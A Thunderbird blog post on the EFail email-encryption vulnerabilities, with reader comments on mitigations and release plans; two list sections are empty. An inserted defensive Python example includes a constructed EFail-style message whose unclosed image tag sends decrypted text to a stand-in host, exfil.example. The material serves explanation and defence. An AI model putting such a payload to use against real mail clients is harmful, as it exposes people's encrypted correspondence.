
EFail and Thunderbird, What You Need To Know

Yesterday, researchers and the press published details of security vulnerabilities that would let an attacker obtain the plaintext of encrypted emails. The researchers who uncovered EFail give a good description of how this happens on their website:

In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.

How to know if you’re affected

You’re affected only if you:

How to protect yourself

DO NOT DISABLE ENCRYPTION.
We’ve seen recommendations from some outlets to stop using encrypted Email altogether. If you are sending sensitive data via Email, Thunderbird still recommends using encryption to keep those messages safe. You should, however, check the configuration of the applications you use to view encrypted Email. For Thunderbird, follow our guidelines below to protect yourself.

Until Thunderbird 52.8 and 52.8.1 are released with fixes:

Most of the EFail bugs require a back-channel, and require the attacker to send you a manipulated Email that contains part of a previously obtained encrypted message. Note that clicking content in the Email can also open a back-channel (until the fixes are live).

Enigmail version 2.0.3 also shows a warning now, which should help you be aware if you are affected.


16 responses

Ben Bucksch wrote on

I’m working on a fix as I type this.

The best mitigation right now is View | Message body as | Simple HTML.

That stops this bug, and many others as well. It was specifically created to avoid entire classes of attacks, so it’s good to leave it enabled even when there is a specific fix for this bug, as it should protect against other future problems as well.

Óvári wrote on

Can you please advise the status of the build engineer?
https://blog.mozilla.org/thunderbird/2018/03/were-hiring-a-build-engineer/
Thank you

victorhck wrote on

Thanks for your answers…
I’ll keep using plain-emails in Thunderbird with Enigmail, updated to latest version in my GNU/Linux system…

Happy hackin’!

HeptaSean wrote on

The efail paper says on page 11 that Thunderbird allows exfiltration without user interaction.

On pages 20 and 21 the authors provide more detail and claim that they successfully used a ” tag to bypass remote content blocking.

Doesn’t that contradict your claim that disabling remote content is enough to protect against efail attacks?

Ryan Sipes wrote on

This may have been the case when the report was made, but as of 52.7 (our current release), this has been fixed.

yrro wrote on

Does the default include links with the rel="preconnect" attribute?

Ryan Sipes wrote on

This was patched with the last release, 52.7.

Tree wrote on

I thought stable Thunderbird 60 was coming out yesterday. Any ETA?

Ryan Sipes wrote on

Right now it is looking like early June.

Óvári wrote on

Thunderbird 60.0 Beta is available at:
https://www.thunderbird.net/channel/


Below is an approximate outline and order of our plans for the next few months:
* release 52.8.0 (released at https://www.thunderbird.net/)
* release 60.0b7, and 60.0b8 if needed, using Taskcluster build infrastructure [1]
* release 52.8.1 for security updates that were not ready for 52.8.0
* release 60.0 for manual updates only [2] (June)
* release 60.1.0 and 52.9.0 (July)
* release 60.2.0 and end of life for 52 (September)

https://groups.google.com/forum/#!topic/tb-enterprise/Kdm_dMzASuY

David J. wrote on

Hello,

I use Thunderbird (52.6.0) on a Debian stable. Looking at the release sheet: https://www.thunderbird.net/en-US/thunderbird/releases/, it looks like Thunderbird is currently in version 52.8.0.

Any recommendation on how to best keep up with the latest stable version?

Is there anything that needs to be done on the user side? Is there any problem regarding build, build process or Debian stable package management that the community could help with in order to make sure that Thunderbird users on Debian benefit from the latest versions?

Wayne wrote on

As of Friday, version 52.8.0 is out with a good many security fixes: https://www.thunderbird.net/en-US/thunderbird/52.8.0/releasenotes/

Gerald Reimer wrote on

I have tried to get Thunderbird on this S7+ Apple iPhone. How do I do this?

Harald Arnesen wrote on

E-mail is plain text. Period.

Greg Jaxon wrote on

E-mail is plain text. Period.

“Ascii shall receive.” (Matt 7:7)

Ironically, one defense is to encrypt your message bracketed by (respectively) ending and beginning quotes and HTML tag fragments to prevent the formation of URLs that embed your secret message.

Would it not suffice to insist that each part of a multipart package be self-contained (i.e. that the part-splicer cause a full exit of the parser stack for any grammar operating on the spliced parts)?
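The post's description of EFail (an HTML tag opened before the decrypted text, so the plaintext ends up inside a URL the renderer fetches) and the suggestion in the comment above that each multipart part be self-contained both point at the same boundary problem. The following added example, which is not code from Thunderbird, Enigmail or the EFail paper, shows a renderer that seals every MIME part before anything is joined, next to a check that lists the remote URLs a rendered document would fetch. The function names, the `exfil.example` host and the sample message are constructed for this illustration.

```python
# Added example, not code from Thunderbird, Enigmail or the EFail paper:
# treat every MIME part as self-contained before rendering, and list the
# remote URLs a rendered message would fetch. Names and sample are constructed.
import re
from email import message_from_string
from html import escape
from html.parser import HTMLParser

REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
URL_ATTRS = {"src", "href", "background", "poster"}  # attribute values that get fetched
CSS_URL = re.compile(r"url\(\s*['\"]?\s*(?:https?|ftp)://[^)]*\)", re.IGNORECASE)


def find_unterminated_tag(html: str) -> int:
    """Index of a '<' still open (no '>' outside quotes) at end of input, or -1."""
    i, n = 0, len(html)
    while i < n:
        if html[i] != "<":
            i += 1
            continue
        start, quote, i = i, None, i + 1
        while i < n and not (html[i] == ">" and quote is None):
            if quote is None and html[i] in "\"'":
                quote = html[i]
            elif html[i] == quote:
                quote = None
            i += 1
        if i == n:
            return start  # ran off the end while still inside the tag
        i += 1
    return -1


def seal_part(html: str) -> str:
    """Force a full parser exit at the part boundary: text after an
    unterminated '<' is escaped, so the tag cannot swallow the next part."""
    cut = find_unterminated_tag(html)
    return html if cut < 0 else html[:cut] + escape(html[cut:])


class _RemoteRefCollector(HTMLParser):
    """Records every URL a renderer with remote content enabled would request."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None:
                continue
            if name in URL_ATTRS and REMOTE_SCHEME.match(value):
                self.urls.append(value)
            elif name == "style":  # url(...) in inline CSS also triggers a fetch
                self.urls.extend(CSS_URL.findall(value))


def remote_references(html: str) -> list:
    parser = _RemoteRefCollector()
    parser.feed(html)
    parser.close()
    return parser.urls


def render_naively(raw_message: str) -> str:
    """Unsafe shape: splice every part's raw body into one document, so a tag
    opened in one part can absorb the text of the next."""
    msg = message_from_string(raw_message)
    return "".join(p.get_payload() for p in msg.walk() if not p.is_multipart())


def render_isolated(raw_message: str) -> str:
    """Seal each HTML part on its own; text/plain is escaped, never parsed as HTML."""
    msg = message_from_string(raw_message)
    pieces = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        body = part.get_payload()
        if part.get_content_type() == "text/html":
            pieces.append(seal_part(body))
        else:
            pieces.append("<pre>" + escape(body) + "</pre>")
    return "".join(pieces)


# Constructed sample: an HTML part that stops inside an image URL, a plain-text
# part standing in for a decrypted body, and a part that closes the tag again.
SAMPLE_MESSAGE = """\
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="demo-boundary"

--demo-boundary
Content-Type: text/html

<img src="http://exfil.example/?
--demo-boundary
Content-Type: text/plain

Meeting at 10:00, codename KESTREL.
--demo-boundary
Content-Type: text/html

">
--demo-boundary--
"""
```

With the naive renderer, `remote_references` reports one URL that carries the plain-text part; with `render_isolated` it reports none and the text is displayed as text. Sealing parts is the structural fix; blocking remote content (the Simple HTML view recommended above) is the complementary setting, and a check like `remote_references` run before display is how a client can confirm that rendering a message would send no request at all.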

Susan Kirkland wrote on

Thank you for the notification. My IT guy will keep watch over my computer.
